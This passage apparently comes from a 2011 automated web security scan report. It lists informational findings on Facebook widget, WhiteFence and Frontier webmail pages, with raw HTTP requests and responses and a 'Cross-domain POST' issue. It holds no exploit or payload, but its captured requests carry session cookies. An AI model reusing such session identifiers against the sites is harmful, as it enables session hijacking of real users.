class="connect_widget_button_count_excluding"><table class="uiGrid" cellspacing="0" cellpadding="0"><tbody><tr><td><div class="connect_widget_button_count_nub"><s></s><i></i></div></td><td><div class="connect_widget_button_count_count">7</div></td></tr></tbody></table></td></tr></table></div></div><script type="text/javascript">
Env={module:"like_widget",impid:"4c0e1f07",fb_dtsg:"AQAYOj0A",no_cookies:1,lhsh:"8AQAgPw2r"};
</script>
<script>



onloadRegister(function (){Bootloader.done([])});
onloadRegister(function (){(function() { new ExternalPageLikeWidget({"viewer":0,"channelURL":"http:\/\/static.ak.fbcdn.net\/connect\/xd_proxy.php?version=3#cb=f350110394&origin=http\u00253A\u00252F\u00252Fservicetips.whitefence.com\u00252Ff22e23ccd4&relation=parent.parent&transport=postmessage","nodeType":"page","externalURL":"http:\/\/servicetips.whitefence.com\/","pageId":null,"widgetID":"connect_widget_4e660b2c9a6249745044162","alreadyConnected":false,"viewerIsAdmin":false,"adminUrl":"","sho
...[SNIP]...

Request 2

GET /plugins/like.php?api_key=117892634961387&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df350110394%26origin%3Dhttp%253A%252F%252Fservicetips.whitefence.com%252Ff22e23ccd4%26relation%3Dparent.parent%26transport%3Dpostmessage&href=http%3A%2F%2Fservicetips.whitefence.com%2F&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=110 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3D%26placement%3Drecommendations%26extra_2%3DUS; datr=ivleTmw_y94Pr8J55qefqDAM

Response 2

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.64.51.41
X-Cnection: close
Date: Tue, 06 Sep 2011 11:59:48 GMT
Content-Length: 25748

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;</script><title>Like</title><style>body{background:#fff;font-size: 11px;font-famil
...[SNIP]...
<div id="connect_widget_4e660b34e26257359423897" class="connect_widget button_count" style=""><table class="connect_widget_interactive_area"><tr><td class="connect_widget_vertical_center connect_widget_button_cell"><div class="connect_button_slider"><div class="connect_button_container"><a class="connect_widget_like_button clearfix like_button_no_like"><div class="tombstone_cross"></div><span class="liketext">Like</span></a></div></div></td><td class="connect_widget_vertical_center connect_widget_confirm_cell"><span class="connect_widget_confirm_span hidden_elem"><a class="mrm connect_widget_confirm_link">Confirm</a></span></td><td class="connect_widget_button_count_including hidden_elem"><table class="uiGrid" cellspacing="0" cellpadding="0"><tbody><tr><td><div class="thumbs_up hidden_elem"></div></td><td><div class="undo hidden_elem"></div></td></tr><tr><td><div class="connect_widget_button_count_nub"><s></s><i></i></div></td><td><div class="connect_widget_button_count_count">8</div></td></tr></tbody></table></td><td class="connect_widget_button_count_excluding"><table class="uiGrid" cellspacing="0" cellpadding="0"><tbody><tr><td><div class="connect_widget_button_count_nub"><s></s><i></i></div></td><td><div class="connect_widget_button_count_count">7</div></td></tr></tbody></table></td></tr></table></div></div><script type="text/javascript">
Env={module:"like_widget",impid:"ea8d7d0d",fb_dtsg:"AQAYOj0A",no_cookies:1,lhsh:"aAQC_ClyB"};
</script>
<script>



onloadRegister(function (){Bootloader.done([])});
onloadRegister(function (){(function() { new ExternalPageLikeWidget({"viewer":0,"channelURL":"http:\/\/static.ak.fbcdn.net\/connect\/xd_proxy.php?version=3#cb=f350110394&origin=http\u00253A\u00252F\u00252Fservicetips.whitefence.com\u00252Ff22e23ccd4&relation=parent.parent&transport=postmessage","nodeType":"page","externalURL":"http:\/\/servicetips.whitefence.com\/","pageId":null,"widgetID":"connect_widget_4e660b34e26257359423897","alreadyConnected":false,"viewerIsAdmin":false,"adminUrl":"","sho
...[SNIP]...

13.9. http://www.facebook.com/plugins/likebox.php

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.facebook.com
Path:   /plugins/likebox.php

Request 1

GET /plugins/likebox.php?id=106890669355244&width=290&connections=0&stream=false&header=false&height=62 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://shopping.yahoo.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3D%26placement%3Drecommendations%26extra_2%3DUS; datr=ivleTmw_y94Pr8J55qefqDAM

Response 1

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.64.126.38
X-Cnection: close
Date: Tue, 06 Sep 2011 12:45:17 GMT
Content-Length: 8244

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;</script><title>Likebox</title>
<link type="text/css" rel="stylesheet" href="h
...[SNIP]...
<div id="connect_widget_4e6615dd59b5b2a87228642" class="connect_widget" style=""><table class="connect_widget_interactive_area"><tr><td class="connect_widget_vertical_center connect_widget_button_cell"><div class="connect_button_slider" style=""><div class="connect_button_container"><a class="connect_widget_like_button clearfix like_button_no_like"><div class="tombstone_cross"></div><span class="liketext">Like</span></a></div></div></td><td class="connect_widget_vertical_center"><span class="connect_widget_confirm_span hidden_elem"><a class="mrm connect_widget_confirm_link">Confirm</a></span></td><td class="connect_widget_vertical_center"><div class="connect_confirmation_cell connect_confirmation_cell_no_like"><div class="connect_widget_text_summary connect_text_wrapper"><span class="connect_widget_user_action connect_widget_text hidden_elem">You like this.<span class="unlike_span hidden_elem"><a class="connect_widget_unlike_link"></a></span><span class="connect_widget_admin_span hidden_elem">&nbsp;&middot;&nbsp;<a class="connect_widget_admin_option">Admin Page</a><span class="connect_widget_insights_span hidden_elem">&nbsp;&middot;&nbsp;<a class="connect_widget_insights_link">Insights</a></span></span><span class="connect_widget_error_span hidden_elem">&nbsp;&middot;&nbsp;<a class="connect_widget_error_text">Error</a></span></span><span class="connect_widget_summary connect_widget_text"><span class="connect_widget_connected_text hidden_elem">You like this.</span><span class="connect_widget_not_connected_text">37,477</span><span class="unlike_span hidden_elem"><a class="connect_widget_unlike_link"></a></span><span class="connect_widget_admin_span hidden_elem">&nbsp;&middot;&nbsp;<a class="connect_widget_admin_option">Admin Page</a><span class="connect_widget_insights_span hidden_elem">&nbsp;&middot;&nbsp;<a class="connect_widget_insights_link">Insights</a></span></span><span class="connect_widget_error_span hidden_elem">&nbsp;&middot;&nbsp;<a 
class="connect_widget_error_text">Error</a></span></s
...[SNIP]...

Request 2

GET /plugins/likebox.php?id=106890669355244&width=290&connections=0&stream=false&header=false&height=62 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3D%26placement%3Drecommendations%26extra_2%3DUS; datr=ivleTmw_y94Pr8J55qefqDAM

Response 2

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.64.137.52
X-Cnection: close
Date: Tue, 06 Sep 2011 12:45:26 GMT
Content-Length: 8217

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;</script><title>Likebox</title>
<link type="text/css" rel="stylesheet" href="h
...[SNIP]...
<div id="connect_widget_4e6615e69ecac3f34230641" class="connect_widget" style=""><table class="connect_widget_interactive_area"><tr><td class="connect_widget_vertical_center connect_widget_button_cell"><div class="connect_button_slider" style=""><div class="connect_button_container"><a class="connect_widget_like_button clearfix like_button_no_like"><div class="tombstone_cross"></div><span class="liketext">Like</span></a></div></div></td><td class="connect_widget_vertical_center"><span class="connect_widget_confirm_span hidden_elem"><a class="mrm connect_widget_confirm_link">Confirm</a></span></td><td class="connect_widget_vertical_center"><div class="connect_confirmation_cell connect_confirmation_cell_no_like"><div class="connect_widget_text_summary connect_text_wrapper"><span class="connect_widget_user_action connect_widget_text hidden_elem">You like this.<span class="unlike_span hidden_elem"><a class="connect_widget_unlike_link"></a></span><span class="connect_widget_admin_span hidden_elem">&nbsp;&middot;&nbsp;<a class="connect_widget_admin_option">Admin Page</a><span class="connect_widget_insights_span hidden_elem">&nbsp;&middot;&nbsp;<a class="connect_widget_insights_link">Insights</a></span></span><span class="connect_widget_error_span hidden_elem">&nbsp;&middot;&nbsp;<a class="connect_widget_error_text">Error</a></span></span><span class="connect_widget_summary connect_widget_text"><span class="connect_widget_connected_text hidden_elem">You like this.</span><span class="connect_widget_not_connected_text">37,477</span><span class="unlike_span hidden_elem"><a class="connect_widget_unlike_link"></a></span><span class="connect_widget_admin_span hidden_elem">&nbsp;&middot;&nbsp;<a class="connect_widget_admin_option">Admin Page</a><span class="connect_widget_insights_span hidden_elem">&nbsp;&middot;&nbsp;<a class="connect_widget_insights_link">Insights</a></span></span><span class="connect_widget_error_span hidden_elem">&nbsp;&middot;&nbsp;<a 
class="connect_widget_error_text">Error</a></span></s
...[SNIP]...

13.10. http://www.whitefence.com/category/high-speed-internet/

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.whitefence.com
Path:   /category/high-speed-internet/

Request 1

GET /category/high-speed-internet/ HTTP/1.1
Host: www.whitefence.com
Proxy-Connection: keep-alive
Referer: http://www.whitefence.com/category/television-service/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=7mgkb57jloi23h6h58j84sq2b4; _vis_opt_s=1%7C; s_cc=true; __utma=218834399.1875876376.1315327922.1315327922.1315327922.1; __utmb=218834399.1.10.1315327922; __utmc=218834399; __utmz=218834399.1315327922.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=telephone%20service; s_sq=%5B%5BB%5D%5D; _vis_opt_test_cookie=1

Response 1

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 11:59:32 GMT
Server: Apache
Vary: *
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html
Content-Length: 31539

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<
...[SNIP]...
<input type="hidden" name="referrer" value="http://www.whitefence.com/category/television-service/" />

<input type="hidden" name="bpID" value="1039546" />
<input type="hidden" name="eID" value="1039547" />

<input type="hidden" name="scKey" value="highSpeedInternetAccess" />
<div class="privacy">privacy &amp; security <a href="/corporate/privacy" target="_blank">protected</a></div>
<button type="submit" id="SubmitGo">Go</button>
</fieldset>
</form>
</div>
<div class="description">

<h1>Compare Cable and DSL High-Speed Internet</h1>
<p>
When it comes to finding the best ways to save money on broadband Internet, we have you covered. WhiteFence gives you the opportunity to compare <strong>high-speed Internet providers</strong> and find a number of great prices and plans, including DSL, cable and satellite Internet. </p>
</div>
<div class="company side panel">
<h2>Search By Company</h2>
<ul class="">

   <li>
       <a href="company/att/category/high-speed-internet/">
           <img src="http://www.whitefence.com/resize/qsrimages/providerlogos/originals/att.70x70.png" alt="AT&amp;T" width="70" height="70" /><span class="company name">AT&T</span>
       </a>
   </li>
   <li>
       <a href="company/uverse/category/high-speed-internet/">
           <img src="http://www.whitefence.com/resize/qsrimages/providerlogos/originals/uverse.70x70.png" alt="Uverse" width="70" height="70" /><span class="company name">Uverse</span>
       </a>
   </li>
   <li>
       <a href="company/verizon/category/high-speed-internet/">
           <img src="http://www.whitefence.com/resize/qsrimages/providerlogos/originals/verizon.70x70.png" alt="Verizon" width="70" height="70" /><span class="company name">Verizon</span>
       </a>
   </li>
   <li>
       <a href="company/fios/category/high-speed-internet/">
           <img src="http://www.whitefence.com/resize/qsrimages/providerlogos/originals/fios.70x70.png" alt="FiOS" width="70" heigh
...[SNIP]...

Request 2

GET /category/high-speed-internet/ HTTP/1.1
Host: www.whitefence.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=7mgkb57jloi23h6h58j84sq2b4; _vis_opt_s=1%7C; s_cc=true; __utma=218834399.1875876376.1315327922.1315327922.1315327922.1; __utmb=218834399.1.10.1315327922; __utmc=218834399; __utmz=218834399.1315327922.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=telephone%20service; s_sq=%5B%5BB%5D%5D; _vis_opt_test_cookie=1

Response 2

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:00:17 GMT
Server: Apache
Vary: *
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html
Content-Length: 31485

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<
...[SNIP]...
<input type="hidden" name="referrer" value="" />

<input type="hidden" name="bpID" value="1039546" />
<input type="hidden" name="eID" value="1039547" />

<input type="hidden" name="scKey" value="highSpeedInternetAccess" />
<div class="privacy">privacy &amp; security <a href="/corporate/privacy" target="_blank">protected</a></div>
<button type="submit" id="SubmitGo">Go</button>
</fieldset>
</form>
</div>
<div class="description">

<h1>Compare Cable and DSL High-Speed Internet</h1>
<p>
When it comes to finding the best ways to save money on broadband Internet, we have you covered. WhiteFence gives you the opportunity to compare <strong>high-speed Internet providers</strong> and find a number of great prices and plans, including DSL, cable and satellite Internet. </p>
</div>
<div class="company side panel">
<h2>Search By Company</h2>
<ul class="">

   <li>
       <a href="company/att/category/high-speed-internet/">
           <img src="http://www.whitefence.com/resize/qsrimages/providerlogos/originals/att.70x70.png" alt="AT&amp;T" width="70" height="70" /><span class="company name">AT&T</span>
       </a>
   </li>
   <li>
       <a href="company/uverse/category/high-speed-internet/">
           <img src="http://www.whitefence.com/resize/qsrimages/providerlogos/originals/uverse.70x70.png" alt="Uverse" width="70" height="70" /><span class="company name">Uverse</span>
       </a>
   </li>
   <li>
       <a href="company/verizon/category/high-speed-internet/">
           <img src="http://www.whitefence.com/resize/qsrimages/providerlogos/originals/verizon.70x70.png" alt="Verizon" width="70" height="70" /><span class="company name">Verizon</span>
       </a>
   </li>
   <li>
       <a href="company/fios/category/high-speed-internet/">
           <img src="http://www.whitefence.com/resize/qsrimages/providerlogos/originals/fios.70x70.png" alt="FiOS" width="70" height="70" /><span class="company name">FiOS</span>
       </a>
...[SNIP]...

13.11. http://www.whitefence.com/category/home-phone/

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.whitefence.com
Path:   /category/home-phone/

Request 1

GET /category/home-phone/ HTTP/1.1
Host: www.whitefence.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=telephone+service
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 1

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 11:51:54 GMT
Server: Apache
Vary: *
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html
Content-Length: 29323

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<
...[SNIP]...
<input type="hidden" name="referrer" value="http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=telephone+service" />

<input type="hidden" name="bpID" value="1039546" />
<input type="hidden" name="eID" value="1039547" />

<input type="hidden" name="scKey" value="localPhone" />
<div class="privacy">privacy &amp; security <a href="/corporate/privacy" target="_blank">protected</a></div>
<button type="submit" id="SubmitGo">Go</button>
</fieldset>
</form>
</div>
<div class="description">

<h1>Shop and Save on Home Phone Service Today</h1>
<p>
There's no need to pass on that home phone line just yet. Select from a number of great local phone service options for your home today. Find and compare low rates from each of
the leading <strong>home phone companies</strong> in your area.
</p>
</div>
<div class="company side panel">
<h2>Search By Company</h2>
<ul class="">

   <li>
       <a href="company/att/category/home-phone/">
           <img src="http://www.whitefence.com/resize/qsrimages/providerlogos/originals/att.70x70.png" alt="AT&amp;T" width="70" height="70" /><span class="company name">AT&T</span>
       </a>
   </li>
   <li>
       <a href="company/verizon/category/home-phone/">
           <img src="http://www.whitefence.com/resize/qsrimages/providerlogos/originals/verizon.70x70.png" alt="Verizon" width="70" height="70" /><span class="company name">Verizon</span>
       </a>
   </li>
   <li>
       <a href="company/comcast/category/home-phone/">
           <img src="http://www.whitefence.com/resize/qsrimages/providerlogos/originals/comcast.70x70.png" alt="Comcast" width="70" height="70" /><span class="company name">Comcast</span>
       </a>
   </li>
   <li>
       <a href="company/xfinity/category/home-phone/">
           <img src="http://www.whitefence.com/resize/qsrimages/providerlogos/originals/xfinity.70x70.png" alt="Xfinity" width="70" height="70" /><span class="company name">Xfinity</span
...[SNIP]...

Request 2

GET /category/home-phone/ HTTP/1.1
Host: www.whitefence.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 2

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 11:52:11 GMT
Server: Apache
Vary: *
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html
Content-Length: 29250

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<
...[SNIP]...
<input type="hidden" name="referrer" value="" />

<input type="hidden" name="bpID" value="1039546" />
<input type="hidden" name="eID" value="1039547" />

<input type="hidden" name="scKey" value="localPhone" />
<div class="privacy">privacy &amp; security <a href="/corporate/privacy" target="_blank">protected</a></div>
<button type="submit" id="SubmitGo">Go</button>
</fieldset>
</form>
</div>
<div class="description">

<h1>Shop and Save on Home Phone Service Today</h1>
<p>
There's no need to pass on that home phone line just yet. Select from a number of great local phone service options for your home today. Find and compare low rates from each of
the leading <strong>home phone companies</strong> in your area.
</p>
</div>
<div class="company side panel">
<h2>Search By Company</h2>
<ul class="">

   <li>
       <a href="company/att/category/home-phone/">
           <img src="http://www.whitefence.com/resize/qsrimages/providerlogos/originals/att.70x70.png" alt="AT&amp;T" width="70" height="70" /><span class="company name">AT&T</span>
       </a>
   </li>
   <li>
       <a href="company/verizon/category/home-phone/">
           <img src="http://www.whitefence.com/resize/qsrimages/providerlogos/originals/verizon.70x70.png" alt="Verizon" width="70" height="70" /><span class="company name">Verizon</span>
       </a>
   </li>
   <li>
       <a href="company/comcast/category/home-phone/">
           <img src="http://www.whitefence.com/resize/qsrimages/providerlogos/originals/comcast.70x70.png" alt="Comcast" width="70" height="70" /><span class="company name">Comcast</span>
       </a>
   </li>
   <li>
       <a href="company/xfinity/category/home-phone/">
           <img src="http://www.whitefence.com/resize/qsrimages/providerlogos/originals/xfinity.70x70.png" alt="Xfinity" width="70" height="70" /><span class="company name">Xfinity</span>
       </a>
   </li>
   <li>
       <a href="company/qwest/category/home-phone/">
           
...[SNIP]...

13.12. http://www.whitefence.com/category/television-service/

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.whitefence.com
Path:   /category/television-service/

Request 1

GET /category/television-service/ HTTP/1.1
Host: www.whitefence.com
Proxy-Connection: keep-alive
Referer: http://www.whitefence.com/category/home-phone/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=7mgkb57jloi23h6h58j84sq2b4; _vis_opt_s=1%7C; _vis_opt_test_cookie=1; s_cc=true; __utma=218834399.1875876376.1315327922.1315327922.1315327922.1; __utmb=218834399.1.10.1315327922; __utmc=218834399; __utmz=218834399.1315327922.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=telephone%20service; s_sq=%5B%5BB%5D%5D

Response 1

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 11:59:28 GMT
Server: Apache
Vary: *
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html
Content-Length: 29242

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<
...[SNIP]...
<input type="hidden" name="referrer" value="http://www.whitefence.com/category/home-phone/" />

<input type="hidden" name="bpID" value="1039546" />
<input type="hidden" name="eID" value="1039547" />

<input type="hidden" name="scKey" value="cableSatellite" />
<div class="privacy">privacy &amp; security <a href="/corporate/privacy" target="_blank">protected</a></div>
<button type="submit" id="SubmitGo">Go</button>
</fieldset>
</form>
</div>
<div class="description">

<h1>Compare and Save on Cable &amp; Satellite TV Service</h1>
<p>Ready to enter a whole new world of TV programming? Comparing TV packages from cable, satellite, FiOS or U-verse can save you money on <strong>television service</strong>! No matter what your TV preference is, you can order the perfect <a href="http://www.whitefence.com/information/cable-tv/">cable TV</a> and <a href="http://www.whitefence.com/information/satellite-tv/">satellite TV</a> plans at WhiteFence.</p>
</div>
<div class="company side panel">
<h2>Search By Company</h2>
<ul class="">

   <li>
       <a href="company/att/category/television-service/">
           <img src="http://www.whitefence.com/resize/qsrimages/providerlogos/originals/att.70x70.png" alt="AT&amp;T" width="70" height="70" /><span class="company name">AT&T</span>
       </a>
   </li>
   <li>
       <a href="company/uverse/category/television-service/">
           <img src="http://www.whitefence.com/resize/qsrimages/providerlogos/originals/uverse.70x70.png" alt="Uverse" width="70" height="70" /><span class="company name">Uverse</span>
       </a>
   </li>
   <li>
       <a href="company/verizon/category/television-service/">
           <img src="http://www.whitefence.com/resize/qsrimages/providerlogos/originals/verizon.70x70.png" alt="Verizon" width="70" height="70" /><span class="company name">Verizon</span>
       </a>
   </li>
   <li>
       <a href="company/fios/category/television-service/">
           <img
...[SNIP]...

Request 2

GET /category/television-service/ HTTP/1.1
Host: www.whitefence.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=7mgkb57jloi23h6h58j84sq2b4; _vis_opt_s=1%7C; _vis_opt_test_cookie=1; s_cc=true; __utma=218834399.1875876376.1315327922.1315327922.1315327922.1; __utmb=218834399.1.10.1315327922; __utmc=218834399; __utmz=218834399.1315327922.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=telephone%20service; s_sq=%5B%5BB%5D%5D

Response 2

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:00:13 GMT
Server: Apache
Vary: *
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html
Content-Length: 29196

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<
...[SNIP]...
<input type="hidden" name="referrer" value="" />

<input type="hidden" name="bpID" value="1039546" />
<input type="hidden" name="eID" value="1039547" />

<input type="hidden" name="scKey" value="cableSatellite" />
<div class="privacy">privacy &amp; security <a href="/corporate/privacy" target="_blank">protected</a></div>
<button type="submit" id="SubmitGo">Go</button>
</fieldset>
</form>
</div>
<div class="description">

<h1>Compare and Save on Cable &amp; Satellite TV Service</h1>
<p>Ready to enter a whole new world of TV programming? Comparing TV packages from cable, satellite, FiOS or U-verse can save you money on <strong>television service</strong>! No matter what your TV preference is, you can order the perfect <a href="http://www.whitefence.com/information/cable-tv/">cable TV</a> and <a href="http://www.whitefence.com/information/satellite-tv/">satellite TV</a> plans at WhiteFence.</p>
</div>
<div class="company side panel">
<h2>Search By Company</h2>
<ul class="">

   <li>
       <a href="company/att/category/television-service/">
           <img src="http://www.whitefence.com/resize/qsrimages/providerlogos/originals/att.70x70.png" alt="AT&amp;T" width="70" height="70" /><span class="company name">AT&T</span>
       </a>
   </li>
   <li>
       <a href="company/uverse/category/television-service/">
           <img src="http://www.whitefence.com/resize/qsrimages/providerlogos/originals/uverse.70x70.png" alt="Uverse" width="70" height="70" /><span class="company name">Uverse</span>
       </a>
   </li>
   <li>
       <a href="company/verizon/category/television-service/">
           <img src="http://www.whitefence.com/resize/qsrimages/providerlogos/originals/verizon.70x70.png" alt="Verizon" width="70" height="70" /><span class="company name">Verizon</span>
       </a>
   </li>
   <li>
       <a href="company/fios/category/television-service/">
           <img src="http://www.whitefence.com/resize/qsrimage
...[SNIP]...

14. Cross-domain POST
There are 5 instances of this issue:

Issue background

The POSTing of data between domains does not necessarily constitute a security vulnerability. You should review the contents of the information that is being transmitted between domains, and determine whether the originating application should be trusting the receiving domain with this information.


14.1. https://login.frontier.com/webmail/

Summary

Severity:   Information
Confidence:   Certain
Host:   https://login.frontier.com
Path:   /webmail/

Issue detail

The page contains a form which POSTs data to the domain www.frontieronline.com. The form contains the following fields:

Request

GET /webmail/ HTTP/1.1
Host: login.frontier.com
Connection: keep-alive
Referer: http://frontier.com/winwin1?mkwid=sPb9VHDZ0&pcrid=14742396110
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:30:21 GMT
Server: Apache/2.2.8 (Ubuntu) mod_python/3.3.1 Python/2.5.2
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html
Content-Length: 9630

